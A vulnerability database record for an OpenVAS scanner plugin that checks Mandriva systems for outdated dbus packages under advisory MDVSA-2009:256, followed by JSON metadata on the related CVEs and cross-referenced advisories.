ID OPENVAS:136141256231065733 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2018-04-06T00:00:00
Description
The remote host is missing an update to dbus
announced via advisory MDVSA-2009:256.
# OpenVAS Vulnerability Test
# $Id: mdksa_2009_256.nasl 9350 2018-04-06 07:03:33Z cfischer $
# Description: Auto-generated from advisory MDVSA-2009:256 (dbus)
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_insight = "A vulnerability was discovered and corrected in dbus:
The _dbus_validate_signature_with_reason function
(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic
to validate a basic type, which allows remote attackers to spoof a
signature via a crafted key. NOTE: this is due to an incorrect fix
for CVE-2008-3834 (CVE-2009-1189).
This update provides a fix for this vulnerability.
Affected: 2008.1, 2009.0, Enterprise Server 5.0";
tag_solution = "To upgrade automatically use MandrakeUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
https://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256";
tag_summary = "The remote host is missing an update to dbus
announced via advisory MDVSA-2009:256.";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.65733");
script_version("$Revision: 9350 $");
script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $");
script_tag(name:"creation_date", value:"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)");
script_cve_id("CVE-2008-3834", "CVE-2009-1189");
script_tag(name:"cvss_base", value:"3.6");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:N/I:P/A:P");
script_name("Mandrake Security Advisory MDVSA-2009:256 (dbus)");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("Mandrake Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/mandriva_mandrake_linux", "ssh/login/rpms");
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
res = "";
report = "";
if ((res = isrpmvuln(pkg:"dbus", rpm:"dbus~1.1.20~5.2mdv2008.1", rls:"MNDK_2008.1")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"dbus-x11", rpm:"dbus-x11~1.1.20~5.2mdv2008.1", rls:"MNDK_2008.1")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"libdbus-1_3", rpm:"libdbus-1_3~1.1.20~5.2mdv2008.1", rls:"MNDK_2008.1")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"libdbus-1-devel", rpm:"libdbus-1-devel~1.1.20~5.2mdv2008.1", rls:"MNDK_2008.1")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"lib64dbus-1_3", rpm:"lib64dbus-1_3~1.1.20~5.2mdv2008.1", rls:"MNDK_2008.1")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"lib64dbus-1-devel", rpm:"lib64dbus-1-devel~1.1.20~5.2mdv2008.1", rls:"MNDK_2008.1")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"dbus", rpm:"dbus~1.2.3~2.2mdv2009.0", rls:"MNDK_2009.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"dbus-x11", rpm:"dbus-x11~1.2.3~2.2mdv2009.0", rls:"MNDK_2009.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"libdbus-1_3", rpm:"libdbus-1_3~1.2.3~2.2mdv2009.0", rls:"MNDK_2009.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"libdbus-1-devel", rpm:"libdbus-1-devel~1.2.3~2.2mdv2009.0", rls:"MNDK_2009.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"lib64dbus-1_3", rpm:"lib64dbus-1_3~1.2.3~2.2mdv2009.0", rls:"MNDK_2009.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"lib64dbus-1-devel", rpm:"lib64dbus-1-devel~1.2.3~2.2mdv2009.0", rls:"MNDK_2009.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"dbus", rpm:"dbus~1.2.3~2.2mdvmes5", rls:"MNDK_mes5")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"dbus-x11", rpm:"dbus-x11~1.2.3~2.2mdvmes5", rls:"MNDK_mes5")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"libdbus-1_3", rpm:"libdbus-1_3~1.2.3~2.2mdvmes5", rls:"MNDK_mes5")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"libdbus-1-devel", rpm:"libdbus-1-devel~1.2.3~2.2mdvmes5", rls:"MNDK_mes5")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"lib64dbus-1_3", rpm:"lib64dbus-1_3~1.2.3~2.2mdvmes5", rls:"MNDK_mes5")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"lib64dbus-1-devel", rpm:"lib64dbus-1-devel~1.2.3~2.2mdvmes5", rls:"MNDK_mes5")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:136141256231065733", "type": "openvas", "bulletinFamily": "scanner", "title": "Mandrake Security Advisory MDVSA-2009:256 (dbus)", "description": "The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.", "published": "2009-10-13T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065733", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "lastseen": "2018-04-06T11:39:06", "viewCount": 1, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2018-04-06T11:39:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3834", "CVE-2009-1189"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2010-0018.NASL", "SUSE_DBUS-1-7482.NASL", "REDHAT-RHSA-2010-0018.NASL", "DEBIAN_DSA-1837.NASL", "SUSE_DBUS-1-7483.NASL", "ORACLELINUX_ELSA-2010-0018.NASL", "SL_20090107_DBUS_ON_SL5_X.NASL", "MANDRIVA_MDVSA-2009-256.NASL", "GENTOO_GLSA-200901-04.NASL", "SUSE_11_DBUS-1-110418.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310880595", "OPENVAS:65733", "OPENVAS:1361412562310870201", "OPENVAS:870201", "OPENVAS:136141256231066422", "OPENVAS:880595", "OPENVAS:830423", "OPENVAS:65851", "OPENVAS:66422", "OPENVAS:63155"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-0008", "ELSA-2010-0018"]}, {"type": "exploitdb", "idList": ["EDB-ID:7822"]}, {"type": "gentoo", "idList": ["GLSA-200901-04"]}, {"type": "centos", "idList": ["CESA-2009:0008", "CESA-2010:0018"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22190", "SECURITYVULNS:VULN:10085"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1837-1:C3DAA", "DEBIAN:DSA-1658-1:215BD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:74119"]}, {"type": "redhat", "idList": ["RHSA-2009:0008", "RHSA-2010:0476", "RHSA-2010:0095", "RHSA-2010:0018"]}, {"type": "seebug", "idList": ["SSV:4172", "SSV:4192", "SSV:66216", "SSV:17745"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:03EDEADC4429D708F596466B2E2F298F"]}, {"type": "ubuntu", "idList": ["USN-653-1", "USN-799-1"]}, {"type": "vmware", "idList": ["VMSA-2010-0004"]}], "modified": "2018-04-06T11:39:06", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "136141256231065733", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_256.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:256 (dbus)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in dbus:\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic\nto validate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix\nfor CVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nAffected: 2008.1, 2009.0, Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:256\";\ntag_summary = \"The remote host is missing an update to dbus\nannounced via advisory MDVSA-2009:256.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65733\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_tag(name:\"cvss_base\", value:\"3.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:256 (dbus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.1.20~5.2mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus\", rpm:\"dbus~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dbus-x11\", rpm:\"dbus-x11~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1_3\", rpm:\"libdbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdbus-1-devel\", rpm:\"libdbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1_3\", rpm:\"lib64dbus-1_3~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64dbus-1-devel\", rpm:\"lib64dbus-1-devel~1.2.3~2.2mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Mandrake Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:28:24", "description": "The dbus_signature_validate function in the D-bus library (libdbus) before 1.2.4 allows remote attackers to cause a denial of service (application abort) via a message containing a malformed signature, which triggers a failed assertion error.", "edition": 5, "cvss3": {}, "published": "2008-10-07T21:01:00", "title": "CVE-2008-3834", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3834"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:freedesktop:dbus:0.1", "cpe:/a:freedesktop:dbus:0.91", "cpe:/a:freedesktop:dbus:0.8", "cpe:/a:freedesktop:dbus:0.21", "cpe:/a:freedesktop:dbus:0.36", "cpe:/a:freedesktop:dbus:0.31", "cpe:/a:freedesktop:dbus:0.35.2", "cpe:/a:freedesktop:dbus:0.12", "cpe:/a:freedesktop:dbus:0.35", "cpe:/a:freedesktop:dbus:0.34", "cpe:/a:freedesktop:dbus:0.50", "cpe:/a:freedesktop:dbus:0.22", "cpe:/a:freedesktop:dbus:0.5", "cpe:/a:freedesktop:dbus:0.62", "cpe:/a:freedesktop:dbus:0.23.1", "cpe:/a:freedesktop:dbus:0.9", "cpe:/a:freedesktop:dbus:1.0.2", "cpe:/a:freedesktop:dbus:0.11", "cpe:/a:freedesktop:dbus:0.7", "cpe:/a:freedesktop:dbus:0.90", "cpe:/a:freedesktop:dbus:0.3", "cpe:/a:freedesktop:dbus:0.92", "cpe:/a:freedesktop:dbus:1.1.1", "cpe:/a:freedesktop:dbus:0.2", "cpe:/a:freedesktop:dbus:0.23.2", "cpe:/a:freedesktop:dbus1.0:rc1", "cpe:/a:freedesktop:dbus:0.61", "cpe:/a:freedesktop:dbus:0.36.2", "cpe:/a:freedesktop:dbus1.0:rc2", "cpe:/a:freedesktop:dbus:1.1.4", "cpe:/a:freedesktop:dbus:0.13", "cpe:/a:freedesktop:dbus:0.23", "cpe:/a:freedesktop:dbus:0.6", "cpe:/a:freedesktop:dbus:0.35.1", "cpe:/a:freedesktop:dbus1.0:rc3", "cpe:/a:freedesktop:dbus:0.36.1", "cpe:/a:freedesktop:dbus:1.1.2", "cpe:/a:freedesktop:dbus:0.32", "cpe:/a:freedesktop:dbus:0.10", "cpe:/a:freedesktop:dbus:0.33", "cpe:/a:freedesktop:dbus1.1.0:*", "cpe:/a:freedesktop:dbus:0.4", "cpe:/a:freedesktop:dbus:0.23.3", "cpe:/a:freedesktop:dbus:0.20"], "id": "CVE-2008-3834", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3834", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:freedesktop:dbus:0.22:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.13:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus1.1.0:*:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus1.0:rc3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.61:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.31:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.21:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus1.0:rc1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.50:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.12:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus1.0:rc2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.32:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.62:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.10:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.34:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.33:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:31:18", "description": "The _dbus_validate_signature_with_reason function (dbus-marshal-validate.c) in D-Bus (aka DBus) before 1.2.14 uses incorrect logic to validate a basic type, which allows remote attackers to spoof a signature via a crafted key. NOTE: this is due to an incorrect fix for CVE-2008-3834.", "edition": 5, "cvss3": {}, "published": "2009-04-27T18:00:00", "title": "CVE-2009-1189", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1189"], "modified": "2018-10-03T21:59:00", "cpe": ["cpe:/a:freedesktop:dbus:0.1", "cpe:/a:freedesktop:dbus:0.91", "cpe:/a:freedesktop:dbus:0.8", "cpe:/a:freedesktop:dbus:0.21", "cpe:/a:freedesktop:dbus:0.36", "cpe:/a:freedesktop:dbus:0.31", "cpe:/a:freedesktop:dbus:0.35.2", "cpe:/a:freedesktop:dbus:0.12", "cpe:/a:freedesktop:dbus:0.35", "cpe:/a:freedesktop:dbus:0.34", "cpe:/a:freedesktop:dbus:1.2.1", "cpe:/a:freedesktop:dbus:1.0", "cpe:/a:freedesktop:dbus:0.50", "cpe:/a:freedesktop:dbus:0.22", "cpe:/a:freedesktop:dbus:0.5", "cpe:/a:freedesktop:dbus:0.62", "cpe:/a:freedesktop:dbus:0.23.1", "cpe:/a:freedesktop:dbus:0.9", "cpe:/a:freedesktop:dbus:1.0.2", "cpe:/a:freedesktop:dbus:0.11", "cpe:/a:freedesktop:dbus:0.7", "cpe:/a:freedesktop:dbus:0.90", "cpe:/a:freedesktop:dbus:0.3", "cpe:/a:freedesktop:dbus:0.92", "cpe:/a:freedesktop:dbus:1.1.1", "cpe:/a:freedesktop:dbus:0.2", "cpe:/a:freedesktop:dbus:0.23.2", "cpe:/a:freedesktop:dbus:0.61", "cpe:/a:freedesktop:dbus:0.36.2", "cpe:/a:freedesktop:dbus:1.1.4", "cpe:/a:freedesktop:dbus:0.13", "cpe:/a:freedesktop:dbus:0.23", "cpe:/a:freedesktop:dbus:0.6", "cpe:/a:freedesktop:dbus:0.35.1", "cpe:/a:freedesktop:dbus:1.2.3", "cpe:/a:freedesktop:dbus:0.36.1", "cpe:/a:freedesktop:dbus:1.1.2", "cpe:/a:freedesktop:dbus:1.1.20", "cpe:/a:freedesktop:dbus:0.32", "cpe:/a:freedesktop:dbus:0.10", "cpe:/a:freedesktop:dbus:0.33", "cpe:/a:freedesktop:dbus:1.1.0", "cpe:/a:freedesktop:dbus:0.4", "cpe:/a:freedesktop:dbus:0.23.3", "cpe:/a:freedesktop:dbus:0.60", "cpe:/a:freedesktop:dbus:0.20"], "id": "CVE-2009-1189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1189", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:freedesktop:dbus:0.22:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.13:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.61:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.31:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.21:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.35:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.3:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.50:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.12:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.32:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.60:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.62:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.10:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.36.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.11:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.34:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.33:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.20:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:0.23:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus:1.1.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:55:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "description": "Check for the Version of dbus", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880595", "href": "http://plugins.openvas.org/nasl.php?oid=880595", "type": "openvas", "title": "CentOS Update for dbus CESA-2010:0018 